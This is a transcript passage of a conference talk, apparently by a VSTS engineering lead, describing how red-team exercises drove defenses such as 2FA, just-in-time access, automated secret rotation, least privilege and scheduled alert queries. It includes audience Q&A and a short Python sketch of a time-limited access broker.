Mimikatz from working. Remove dual-homed servers: you'll remember in that graph I showed you from the real attack, they jumped onto a dual-homed server. The great thing about dual-homed servers is you've got access to two things, right? All the better. Any time you've got a machine that's able to access more stuff, you've got more problems. Separate subscriptions: every service should have its own Azure subscription, its own storage, et cetera, so that if you compromise one, you haven't compromised them all, to limit the blast radius. Multi-factor authentication, or 2FA, is super important. If I get your credentials and there's no 2FA challenge, then whatever you can do, well, I can do it. I'm you; I've got your credentials. If there's a 2FA challenge in the mix, it slows me down, and it may stop me, hopefully stops me. And you can combine that, for example, with a just-in-time access system, where you say: if you want access to production SQL, you've got to request it, you go through a 2FA challenge, and then you're only able to access it for some period of time. Question: in production, how many Azure subscriptions does VSTS use? Good question. I meant to go collect those stats and I didn't, but it's a bunch. Whether it's the 40 microservices we heard about yesterday, or 30, 31 services, I'd have to go look, I don't remember. But there are 192 scale units, right? So with separate subscriptions per scale unit, you're at 192 there, and then you've got the storage accounts, and that's separate, so it multiplies out pretty fast. I also meant to get the stats on how many secrets we have in Key Vault; I didn't ask for those, unfortunately, but it's a lot. If I had to guess, I'd say all up we probably have something on the order of close to 2,000 secrets of some form or another: passwords, certificates, subscriptions, you name it. Separate identity for production.
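The just-in-time access idea described a moment ago can be sketched in a few lines. This is a toy model, not any real product's API: a grant is only issued after a 2FA check succeeds, and it carries an expiry, so stolen credentials alone are not enough and access doesn't linger. All names and the one-hour window are made-up examples.

```python
import time

class JitAccess:
    """Toy just-in-time access broker: 2FA-gated, time-boxed grants."""

    def __init__(self, ttl_seconds):
        self.ttl = ttl_seconds
        self.grants = {}  # (user, resource) -> expiry timestamp

    def request(self, user, resource, passed_2fa, now=None):
        """Issue a time-limited grant, but only if the 2FA challenge passed."""
        now = time.time() if now is None else now
        if not passed_2fa:
            return False  # credentials alone are not enough
        self.grants[(user, resource)] = now + self.ttl
        return True

    def allowed(self, user, resource, now=None):
        """Access is permitted only while an unexpired grant exists."""
        now = time.time() if now is None else now
        expiry = self.grants.get((user, resource))
        return expiry is not None and now < expiry

jit = JitAccess(ttl_seconds=3600)  # hypothetical one-hour window
jit.request("alice", "prod-sql", passed_2fa=True, now=0)
print(jit.allowed("alice", "prod-sql", now=1800))  # True: inside the window
print(jit.allowed("alice", "prod-sql", now=7200))  # False: grant expired
```

The point of the design is that an attacker replaying stolen credentials fails at the `passed_2fa` gate, and even a successful insider request stops working once the window closes.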
Question: Buck, sorry, how do you protect the Azure Key Vault? Because to be able to access it, you have to have a key. Yeah, so normally what happens is that the only thing that can access the Key Vault, for the keys in it, is production. Now, for rotating them, there are two pieces. One is that I want to automate all the secret rotation I can possibly automate. There are a few things that can't yet be automated, because of whatever the dependency is, or because the team that owns it hasn't fixed that yet; there are a few external to us that I really want, but there are very few at this point. So I want to enable automatic rotation, so that something is changing those secrets for us, and it's not production itself doing it. So here's what we did. We actually wanted to get good at secret rotation. For a long time it was a very manual effort: somebody from the service delivery team, a small number of people, would have access to the production secrets, and they would have to manually run various scripts and do various things to change a secret from one thing to the next. Starting about a year ago, we put a lot of effort into automating secret rotation. The first step was to get everything fixed so that it could happen, and while we use a common server framework, and that helps us a ton, there were still enough differences across teams that it was an effort to get there. The next thing we did was say: if you want to be good at something, do it all the time. So we've actually changed our deployments so that every time we deploy, we rotate all the secrets that we can rotate automatically, and that allows us to make sure we keep it going all the time. And going back to breach response, when credentials are leaked, and by the way, this was much more painful in the early days: the red team would go through, take over the service, steal a bunch of credentials, and it would take us three or four weeks to rotate all the
credentials, because it was so darn painful, because it was too manual. Every time you've got manual rotation of secrets, it's like anything else in deployment: you have the opportunity to get it wrong, and we have. We've had people get it wrong; we've had live site incidents caused by somebody trying to rotate secrets manually and getting it wrong. So we've invested a lot in automating that and, like I say, folding it into the deployment process, so that every time we deploy, we do a secret rotation. We're not quite where I want to be. I want to literally be able to tell you we can automate every single one; I've got a very small number that I can't right now, and I want to get that fixed too, of course. Question: since these practices have been in place for a while, were there any considerable design changes at the application level? Because most of these, as I see them here, are kind of infrastructure related. That's the first question. The second question is: can you now detect these attacks in real time, can you monitor them, yes or no? And if you can, are there any circuit breakers or stop gates in place to ensure that an attacker can only get a certain set of information and not more? Okay, so start with the first one, architectural changes as a result of this. There have been. For example, we have these 31 microservices, and they all communicate with SPS, for example, with a service principal. As part of these red team attacks, we realized we had granted too much access to some of these service principals. So we went back and set it up so that in the security service it's locked down: if you get the service principal for, let's say, code search, you can't go and start deleting accounts from SPS. It doesn't have permission, and there's no way you can change that permission. So we started applying the principle of least privilege, the least privilege required for each of the service principals to
actually do what's required. Same thing with the SQL injection vulnerability story I was telling earlier. We had not even thought about it: well, if you put SQL in a temp table, should you be able to execute it? Yeah, no, that's a bad idea; turn that off, we don't need that feature. So part of it is thinking through features in our dependencies that we can turn off, and part of it is changing the code itself. We've made other changes, particularly around inter-service communication. We found issues where we were able to bypass certain security checks, and that caused us to go back, for example, to our REST controllers and change how they work, in order to make the security checks more resilient. So there have been things like that, but they tend to be more involved and very specific to our code. The second question, remind me what it was? Can you now monitor and detect these attacks in real time, and if so, do you have any stop gates or circuit breakers to stop the attack? So the answer is yes and no. If you had asked this question a couple of years ago, I'd have said no, we'd never actually managed to do a good job detecting these. And why do I say we never managed to do a good job? When we started doing red team attacks, they weren't very careful, by design. They would intentionally do stuff that, if we'd had detection in place, would have gotten them caught. And we all know a good attacker tries very hard not to be caught: they cover their footprints, they try not to do anything that looks wrong. They would not, for example, create a local account on a VM that happens to be named after a certain nation state that might be in the news. So the red team was doing things that were trying to be obvious, and we still wouldn't find them. At one point they even left Notepad up with some ASCII art on one of the VMs, which was kind of cool. So we were bad at it. Fast forward to 2017: Calypso for us was sort of the
biggest game changer. In production we run the Azure security pack, which you can get externally as Azure Security Center, and we also have all this information flowing back in the form of the various Windows events. So if somebody, for example, creates a local account on a VM, we're going to alert on that; we'll know. But going deeper than that, and actually this is my next slide, maybe I should flip to it: with Calypso we can detect things like people trying to run encoded PowerShell. In this particular case, somebody was actually able to make use of SignalR; they triggered the exploit through a browser and were able to do certain things. But we wrote an alert here using Calypso. Calypso is just running Azure Log Analytics queries on a schedule, every five minutes, and with this one we could detect: okay, somebody's trying to do something funny with SignalR. There are a variety of these we've come up with, some around network connectivity, a variety of things, and we're constantly trying to come up with new ones to detect red team activity. Now, the thing we struggle with most, and I think everybody does, is telling the difference between legitimate and illegitimate access. So if I steal your credentials, and you're an engineer on my team, I've kind of blurred the lines here, but let's say you're an engineer on my team and an attacker takes your credentials. How can I tell the difference between you and the person impersonating you? That's actually very difficult, and I don't have a good answer for it, because then I'm looking for things like: okay, she's modifying code she doesn't normally touch, or she's using a machine that's in Singapore and she's in Redmond, or she's doing it at three in the morning when she should be asleep. You're looking for signals like that, to try to figure out when something that should be normal,
you doing development, is no longer normal. That is still a work in progress. Question: what's the impact of the monitoring on the live site teams, or is it a separate team, how is that handled, and what's the actionable takeaway from this for clients? Okay, so the monitoring is the same monitoring. When, let's say, Calypso runs some query and finds something suspicious, it generates an alert that goes through the same incident management system that other live site alerts go to. If we're breaching SLA, if we've got an availability problem, it generates an alert; the same alerting mechanism is used for security. It's just that the particular incident is about security instead of availability or whatever the problem might be. So it's the same thing, the same service delivery team, the same on-call DRI rotation; everything's the same. Once it happens, we may in fact pull different people in to do different things in reaction to whatever the issue is. And quite honestly, by the way, I mentioned other red teams in the company do events, and they sometimes attack us. The Azure red team did an event back in the spring, and we caught them with one of these queries. But it comes up through the same incident management system we use for everything else. Question: but do you have a dedicated response team once something's occurring? Good question. The company has people who specialize in handling security incidents, and they work on this across the company, for Azure, for Office, et cetera. So if an incident happens, we go look at it and we'll pull in those people, the security incident response team, CSIRP (I forget exactly what it stands for). But the incident response team, we contact them, we pull them in, and then it becomes a quick evaluation of: okay, what's actually happening, is it real or not, is it a red team or an external attacker? And from there it's a matter of
reacting based on what's happening, right? What are they doing? It could be any number of things, and that will determine the response. But yes, there are central teams in Microsoft. And the other thing that can happen, and we had this happen once, back in the spring: somebody on Twitter claimed they had found a way to breach VSTS. That was a new experience for us. We didn't do a particularly good job handling it, and we changed some of our procedures as a result. They posted an image, redacted, claiming: hey, we found a way to get into your system by way of the profile. It turns out they were wrong, which is, you know, good. But the fact that they did this, and that we didn't handle it particularly well, was valuable for us; it made us better at it. The other thing that's happened: I mentioned the Azure red team doing stuff to us and us catching them, but they have also done things to us that we haven't caught. And I will tell you, this whole presentation is about how to change the conversation around security, and I got a dose of my own medicine. I was on the other end of it, where I knew they had breached the system, but I didn't know what they had done, because we hadn't been able to properly trace them through the system. And it's not my people, right? When it's my people, I can go find out what's going on if I'm curious. This felt very different. There's a certain level of helplessness you feel when you know somebody's in the system and you're not yet able to take care of it. Now, over the course of a few hours, we figured out what they were doing, we figured out how to deal with it, et cetera, but that initial feeling is super unsettling. So, lessons learned. Red team versus blue team: my whole purpose in this talk is how to change the conversation, to get away from the dry security conversations where it's either people pushing
back because it's never happened, or, worst case, security is actually security theater, where you have requirements to go do stuff and everybody nods their heads and checks the boxes, but nobody really does the real work. So I use red team versus blue team to change that conversation and keep security top of mind for people. Every time somebody says, "I don't want to show up in the red team event," it's just awesome; that's a measure of success. Phishing is very, very effective as an attack mechanism, so you have to think about how you protect against it; 2FA challenges are really the best approach there. You also saw the results of phishing our own team a couple of years ago. We've done others since, and thankfully response rates have gotten much better, but it'll never be perfect: every time you add somebody new to the team, it's another opportunity for somebody to get phished or not be on guard. The engineering system is important. Engineering systems are always important, but they matter for security because if I can get into your engineering system, I can get into your service. And this is a hard one to defend against, because if I steal a developer's credentials, just like the conversation she and I were having, if I can get her credentials and she's a developer on my team, how can I tell the difference? So I can't say I've got full solutions for everything there. But when you go back and look at how some of these things have progressed, being able to thwart Mimikatz, being able to keep test credentials from being misappropriated, trying to stop these things at the front door, they help. And the other side is detection, and like I say, some of that is still a work in progress. And defense in depth: it's going to happen, they're going to get in, and you're best off assuming that everything you have can be and will be attacked. So a service might be behind the scenes, it might not be publicly facing, there might
not be a single public entry point to something that's running behind the scenes, but if it has access to anything, if it's at all interesting, once an attacker's in, they will go after it, because internal systems tend to be much softer targets and very valuable. So every time you put a boundary in place, every time you make it harder, it does two things: one, it slows them down, and two, it gives you the opportunity to catch them, because the more stuff they have to do to traverse the graph, the more opportunities you have to detect what they're doing. And the last thing, as we've talked about a couple of times: don't ever cross trust realms. Don't allow production to trust anything that's not production. It's subtle, but it's a great way to get in. And on that note, thank you very much. I appreciate it.